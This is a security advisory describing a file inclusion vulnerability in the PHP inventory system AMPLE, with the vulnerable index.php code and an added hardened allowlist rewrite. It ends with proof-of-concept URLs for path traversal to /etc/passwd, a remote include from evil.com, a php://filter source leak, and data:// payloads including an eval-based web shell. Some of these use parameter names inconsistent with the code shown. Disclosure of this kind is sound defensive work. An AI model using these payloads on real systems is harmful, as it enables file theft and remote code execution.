Update
Update 2023/09/04
The vulnerability has been included and approved for public disclosure by MITRE.
Update 2023/09/03
On September 3rd, I submitted the vulnerability to VulDB and was assigned a CVE number.
Vuln_Author: WEI(ギカク)
AMPLE
AMPLE is an open source inventory management system, written in PHP, for inventory management and monitoring of goods.
The following powerful features are included:
- Real-time Stock Visibility: Keep track of your inventory levels in real-time, ensuring you never run out of stock or overstock.
- Accurate Sales Tracking: Monitor sales patterns, identify popular products, and make data-driven decisions.
- Order Management: Process orders efficiently, reducing fulfillment time and enhancing customer satisfaction.
- Cost Savings: Minimize losses due to overstocking, spoilage, or theft, maximizing profitability.
File Inclusion Vulnerability
The file inclusion vulnerability exists in the index.php file, which has the following source code:
<?php require_once 'inc/header.php'; ?>
<?php require_once 'inc/sidebar.php'; ?>
<!-- Content Wrapper. Contains page content -->
<?php
if (isset($_GET['page'])) {
    $page = 'pages/' . $_GET['page'] . '.php';
} else {
    $page = 'pages/dashboard.php';
}
if (file_exists($page)) {
    require_once $page;
} else {
    require_once 'pages/error_page.php';
}
?>
<!-- Control Sidebar -->
<aside class="control-sidebar control-sidebar-dark">
    <!-- Control sidebar content goes here -->
</aside>
<!-- /.control-sidebar -->
<?php require_once 'inc/footer.php'; ?>
This code has a file inclusion vulnerability.
The value of the page GET parameter is concatenated into a path and passed to require_once without any validation. The file_exists() check only confirms that the resulting path exists; it does not restrict which path the request may name. Allowing unvalidated user input to choose the file that PHP includes can lead to malicious code execution.
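As an added example (not part of the original advisory and not AMPLE's own code), the same router rewritten so that the page parameter can only select an entry from a fixed allowlist. The page names in the allowlist and the log message format are assumptions for illustration, not AMPLE's real page list; the point is that user input is used only as a lookup key and never becomes part of the included path.

```php
<?php
// Added example: hardened replacement for the routing block in index.php.
// Not AMPLE's code; the page names below are assumptions for illustration.

// Map of permitted ?page= values to the file that implements each one.
// Only values of this array ever reach require_once, so traversal
// sequences, absolute paths and stream wrappers never reach the include.
$allowedPages = [
    'dashboard' => 'pages/dashboard.php',
    'products'  => 'pages/products.php',
    'orders'    => 'pages/orders.php',
];

/**
 * Resolve the requested page name to a file path using the allowlist.
 * Returns the error page for anything that is not an exact allowlist key.
 */
function resolvePage(array $allowed, ?string $requested): string
{
    // Default page when the parameter is absent or empty.
    if ($requested === null || $requested === '') {
        return $allowed['dashboard'];
    }

    // Exact-match lookup; no string concatenation with user input occurs.
    if (array_key_exists($requested, $allowed)) {
        return $allowed[$requested];
    }

    // Unexpected values are worth logging: they are a useful detection
    // signal for traversal or wrapper probing against this endpoint.
    error_log(sprintf(
        'index.php: rejected page parameter %s from %s',
        json_encode($requested),
        $_SERVER['REMOTE_ADDR'] ?? 'unknown'
    ));
    return 'pages/error_page.php';
}

// $_GET['page'] may be an array (page[]=x); treat anything that is not a
// string as absent rather than letting it reach the typed parameter.
$requested = $_GET['page'] ?? null;
if (!is_string($requested)) {
    $requested = null;
}

require_once 'inc/header.php';
require_once 'inc/sidebar.php';
require_once resolvePage($allowedPages, $requested);
require_once 'inc/footer.php';
```

Adding a new page means adding one allowlist entry, which keeps the set of includable files reviewable in one place. The error_log() call gives a single place to hook detection, since every rejected value is a request that a legitimate link from the application would never produce.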
PoC
Since this is a textbook file inclusion vulnerability, constructing a request that triggers it is straightforward.
http://example.com/index.php?page=../../../etc/passwd
http://example.com/index.php?filename=http://evil.com/malicious.php
http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index
http://example.com/index.php?page=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA/Pg==
?c=data://text/plain,<?php echo "Gikaku";?>
?c=data://text/plain,<?php eval($_POST['cmd']);?>